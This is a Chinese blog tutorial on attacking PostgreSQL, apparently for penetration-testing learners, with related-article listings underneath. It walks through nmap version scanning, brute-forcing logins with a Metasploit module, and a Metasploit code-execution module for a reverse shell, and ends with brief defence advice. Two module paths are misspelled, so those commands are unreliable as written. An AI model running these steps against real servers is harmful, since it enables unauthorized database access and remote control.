web渗透--postgresql密码破解,简单漏洞利用

最新推荐文章于 2024-04-29 20:12:45 发布
最新推荐文章于 2024-04-29 20:12:45 发布
阅读量1.2k 收藏 2
点赞数
分类专栏: web渗透 黑客技术分享 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MysteriousMadness/article/details/108544541
版权

postgresql介绍

  • postgresql是对象基础型数据库管理系统,支持大部分SQL标准并且提供了许多其他的现代特性:复杂查询、外键、触发器、视图、事务完整性、MVCC。同样,PostgreSQL可以用许多方法扩展,比如,通过增加新的数据类型、函数、操作符、聚集函数、索引。
  • 一般使用的是5432端口号。
  • https://www.postgresql.org/

探测postgresqlkeyi

  • nmap -sV 目标IP地址 -p 5432
  • 探测目标postgresql版本信息。
  • msf下postgres_version也可以查看
  • msf更加精细化
  • 因为探测都有误差,只能大概探测

暴力破解

  • 在msf下使用postgresql_login模块,破解系统登陆用户名和密码。
  • msfconsole
  • use ausliary/scanner/postgres/postgres_login
  • show options
  • 用set设置rhost、username/user_file、password/pass_file
  • show options
  • exploit/run

登录postgresql

  • 使用pyadmin客户端软件登录postgresql。

postgresql代码执行利用

  • 利用msf下postgresql的代码执行获得反弹shell。
  • msfconsole
  • search postgresql
  • use exploit/linux/postgres/postgrespayload
  • show info 查看模块信息
  • set rhosts、lhosts
  • run

防御

  • 屏蔽任意IP连接postgresql
  • 升级版本,安全配置。
lao_wine
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
postgresql 渗透测试_渗透经验分享之SQL注入思路拓展
weixin_28686463的博客
12-24 482
写在文前从实习到现在,因为从事打点工作的原因,实战经验积累了很多,就想写一些自己在实战中碰到的问题,以及自己的解决方法,因为保密的原因大多数不提供复现环境和截图,权当对渗透思路的一个拓展吧。可能会多写几篇,也可能因为实战经验不足就此荒废这个系列。总之看心情和时间安排吧。注入的几个问题SQL注入所涉及到的东西无非就以下几方面哪里会经常出现注入bypass waf如何快速定位重要数据表大数据...
postgresql 渗透测试_WEB安全渗透测试基础知识(二十三)
weixin_35884854的博客
12-23 248
免责声明:本公众号发布的文章均转载自互联网或经作者投稿授权的原创,文末已注明出处,其内容和图片版权归原网站或作者本人所有,并不代表安全+的观点,若有无意侵权或转载不当之处请联系我们处理,谢谢合作!SQLMap基本使用8.3. SQLMap使用安装 git clone https://github.com/sqlmapproject/sqlmap.git sqlmap8.3.1. 常用参数...
CVE-2024-3116 PgAdmin8.4代码执行漏洞
最新发布
A345545108的博客
04-29 1029
在有闲情的时候,看了一下最近的CVE,看到了pgAdmin4在8.4版本之前存在着一个远程代码执行漏洞,因为pgAdmin4在github是开源的,网上也没有看到分析文章,于是就把源码下载了下来,根据漏洞的描述大致的分析了一下代码的触发原因。
Kali学习 | 漏洞利用:4.6 渗透攻击PostgreSQL数据库服务
qq_43233085的博客
01-10 1251
Kali学习 | 漏洞利用:4.6 渗透攻击PostgreSQL数据库服务PostgreSQL介绍操作步骤 PostgreSQL介绍 PostgreSQL是一个自由的对象——关系数据库服务(数据库管理系统)。它在灵活的BSD-风格许可证下发行。 当第一次启动msfconsole时,Kali中的Metasploit会创建名称为msf3的PostgreSQL数据库,并生成保存渗透测试数据所需的数据表。...
postgresql 安全漏洞介绍
HighGO
06-18 1702
作者:瀚高PG实验室(Highgo PG Lab)-Chrisx 文章目录介绍版本漏洞安全漏洞处理 介绍 PostgreSQL安全更新主要作为次要版本升级提供。我们始终建议您使用可用的最新次要版本,因为它可能还包含其他与安全无关的修复程序。所有已知的安全问题都会在下一个主要版本发布时得到修复。 版本漏洞 漏洞列出了它们出现在哪个主要版本中,以及每个漏洞都固定在哪个版本中。如果该漏洞在没有有效登录的情况下可被利用,则也会说明这一点。它们还列出了一个漏洞类,但我们敦促所有用户阅读该描述,以确定该漏洞是否会影响特
PostgreSQL渗透测试总结
爱上卿的博客
01-24 2350
一、前言 PostgreSQL是一个开源数据库,主要部署于Linux操作系统中。然而,PostgreSQL的兼容性非常好,可以兼容多个操作系统,也能在Windows及MacOS操作系统上运行。如果PostgreSQL数据库没有被正确配置,并且攻击者已经事先获取了凭证信息,那么他们就可以实施各类攻击行为,比如读写系统文件以及执行任意代码等。 来演示的目标系统是Metasploitable 2,因...
Web渗透测试工程师—初级教程.zip
11-25
Web渗透测试是网络安全领域的一个重要组成部分,主要针对Web应用程序进行安全评估,发现并修复潜在的安全漏洞。本初级教程将引导初学者逐步理解Web渗透测试的基础知识,为后续深入学习打下坚实基础。 第一章:你...
sqlmap-1.6.5-11_sqlmap-1.6.5-11
09-20
这个工具的主要目标是检测并利用网站应用程序中的SQL注入漏洞,帮助安全研究人员或渗透测试人员发现潜在的安全风险,提升网络系统的安全性。在本文中,我们将深入探讨SQLMap的功能、工作原理以及如何使用它来检测和...
CISP-PTE模拟练习网站源码.zip
11-22
5. **渗透测试技术**:源码中可能包含了一些模拟漏洞的场景,用于模拟渗透测试,比如SQL注入漏洞、文件包含漏洞、命令注入等。学习者可以通过这些模拟场景来实践渗透测试技巧。 6. **前端技术**:网站的前端部分...
04web安全渗透测试.doc
12-02
Sqlmap 是一个开源的渗透测试工具,用于检测和利用 SQL 注入漏洞。它可以自动地检测和利用 SQL 注入漏洞,获取数据库的敏感信息。Sqlmap 支持多种数据库管理系统,包括 MySQL、PostgreSQL、Microsoft SQL Server、...
Python-BBQSQLSQL注入开发工具
08-10
它专为安全研究人员和渗透测试人员设计,用于检测和利用SQL注入漏洞。在信息安全领域,SQL注入是一种常见的攻击手段,攻击者通过在Web应用程序的输入字段中插入恶意SQL代码,来获取、修改或删除数据库中的敏感信息。...
Postgresql渗透利用总结1
08-03
1. 查看当前系统版本: 2. 列出系统目录: 3. 读取系统文件100行: 4. 写入文件:(两种方式) 5. 列出所有数据库: 6. 列出所有表名: 7.
破解版pgsql10.4
07-16
亲测可用,pg10.4 直接安装使用,快速高效,轻量。。。
SQL注入渗透PostgreSQL(bypass tricks)
weixin_54787877的博客
03-13 2816
我们将研究Web应用程序防火墙的绕过方法,以及在不同的查询子句中泄漏数据的方法,例如SELECT,WHERE,ORDER BY,FROM等。 简要概述一下,PostgreSQL是: […] a free and open-source relational database management system emphasizing extensibility and technical standards compliance. It is designed to handle a range o..
浅析postgresql数据库攻击技术
chuancuili8770的博客
01-14 601
postgresql简单介绍 PostgreSQL是一种特性非常齐全的自由软件的对象-关系型数据库管理系统,可以说是目前世界上最先进,功能最强大的自由数据库管理系统。 PostgreSQL是以加州大学伯克利分校计算机系开发的 POSTGRES,版本 4.2为基础的对象关系型数据库管...
postgresql 查看用户密码_PostgreSQL任意命令执行漏洞利用(CVE-2019-9193)
weixin_39539563的博客
11-24 506
最近没事曰曰内网,偶然发现了一个使用密码的pg(是的,连爆破都省了)。用navicat连上去看了下几个库都是一些业务测试数据,没什么好收集;不死心,google了一下发现有个比较新的CVE好像可以操作一下~漏洞概述最近,安全研究人员披露了PostgreSQL实例代码执行漏洞(CVE-2019-9193)的漏洞细节。具有数据库 服务器 文件读取权限的攻击者可以利用此漏洞执行任意系统命令。从9....
MSF连接postgresql密码恢复的方法
baynk的博客
06-02 1237
最近加班严重,好累!!! 0x01 找回密码 在学习msf的时候,发现想使用msf内置的db_nmap需要进行连接数据库处理,但是想不出来postgresql的用户名和密码。通过查找资料,找到了一种较为简直与快速的方式。 首先配置postgresql的配置文件,vim /etc/postgresql/11/main/pg_hba.conf做如下更改 将IPV4连接下的md5改为trust,使登陆数据库时不需要密码。接着开启数据库,注意,如果已经开启了数据库的话需要将start改为restart syst
渗透中利用postgresql getshell
3569
01-11 8039
Copy from http://www.jianfensec.com/postgresql_getshell.html 0x00 前言 研究postgresql数据库如何getshell是在渗透中遇到一个pgAdmin的web管理页面可以直接操作postgresql且通过网上的文章没有达到9.6版本getshell的效果所以便有了以下文章。解决新版本写入函数so文件创建函数失败问
web渗透测试----5、暴力破解漏洞--(3)FTP密码破解
七天
06-23 1679
FTP暴力破解
mybatis-plus集成postgresql配置
05-05
要将 MyBatis-Plus 集成 PostgreSQL,您需要执行以下步骤: 1. 添加 PostgreSQL 的 JDBC 驱动程序依赖项到项目中。 ```xml <dependency> <groupId>org.postgresql</groupId> <artifactId>postgresql</artifactId> <version>版本号</version> </dependency> ``` 2. 修改 MyBatis 的配置文件,指定 PostgreSQL 的驱动和连接信息。 ```yaml spring: datasource: driver-class-name: org.postgresql.Driver url: jdbc:postgresql://localhost:5432/数据库名 username: 用户名 password: 密码 ``` 3. 配置 MyBatis-Plus 的相关参数。 ```java @Configuration @MapperScan(basePackages = "com.example.mapper") public class MybatisPlusConfig { @Bean public PaginationInterceptor paginationInterceptor() { return new PaginationInterceptor(); } } ``` 4. 编写数据访问层的代码。 ```java @Mapper public interface UserMapper extends BaseMapper<User> { } ``` 您可以使用 MyBatis-Plus 的基本 CRUD 接口和方法来访问数据库。 希望这些步骤对您有所帮助。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

lao_wine

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值